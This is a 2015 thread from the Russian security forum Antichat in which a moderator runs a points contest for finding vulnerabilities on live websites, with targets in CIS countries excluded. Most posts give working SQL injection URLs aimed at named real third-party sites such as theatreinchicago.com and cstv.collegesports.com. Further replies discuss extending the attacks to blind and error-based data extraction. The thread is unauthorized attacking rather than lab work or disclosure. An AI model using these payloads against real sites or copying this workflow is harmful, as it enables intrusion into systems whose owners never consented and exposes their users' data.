ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

01.06.2015, 18:55
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Правила:
Ваша задача найти уязвимости в веб-приложениях.
Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ).
Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.
За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).
В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:
Сообщение от None
Сайт: example.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://example.com/index.php?id=1 UNION SELECT 1,2,3,table_name FROM information_schema.tables
Код уязвимости:
Код:
Code:
$query = "SELECT news FROM cds WHERE id=".$_GET['id'];
Уязвимости:
- SQL Injection (2 балла)
- Stored XSS (2 балла)
- Reflected XSS (1 балл)
- Local File Inclusion (3 балла)
- Remote File Inclusion (4 балла)
- Remote Code Execution (5 баллов)
- XXE (5 баллов)
- Arbitary File Read (3 балла)
Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/
Типы уязвимостей:
- Оранжевые (с приложенным исходным кодом уязвимости)
- Серые (эксплоит без кода)
|
|
|

04.06.2015, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 11777
Репутация:
1
|
|
Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
|
|
|
|

04.06.2015, 17:27
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от dmn75
dmn75 said:
↑
Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.
P. S. активнее, ребят
|
|
|

04.06.2015, 17:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
|
|
|
|

04.06.2015, 17:50
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от BabaDook
BabaDook said:
↑
А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
Сообщение от yarbabin
yarbabin said:
↑
Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов
исходники с уязвимостью прибавляют баллы, но можно и без них
|
|
|

04.06.2015, 18:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 11777
Репутация:
1
|
|
Да, тулзой кручу.
Сайт: theatreinchicago.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8
Сайт: tsgconsumer.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0
Сайт: alicekwartler.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]
Сайт: athenscine.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20
Сайт: classifieds.chiangmaicitylife.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1
Сайт: cstv.collegesports.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5
Сайт: ctnrecruiting.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Сайт: diarionecochea.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo
Сайт: dogarchive.kennel-apbt.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1
Сайт: eu.bosscom.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://eu.bosscom.com/product.asp?id=[t]
Какой именно запрос на вывод нужен?
|
|
|
|

04.06.2015, 18:34
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от dmn75
dmn75 said:
↑
Какой именно запрос на вывод нужен?
если blind, то хотя бы substring версии
|
|
|

04.06.2015, 18:36
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от yarbabin
yarbabin said:
↑
если blind, то хотя бы substring версии
substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.
|
|
|

04.06.2015, 18:52
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от BigBear
BigBear said:
↑
substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.
а разница?
|
|
|

04.06.2015, 18:56
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от yarbabin
yarbabin said:
↑
а разница?
Для развеивания шаблонного мышления.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|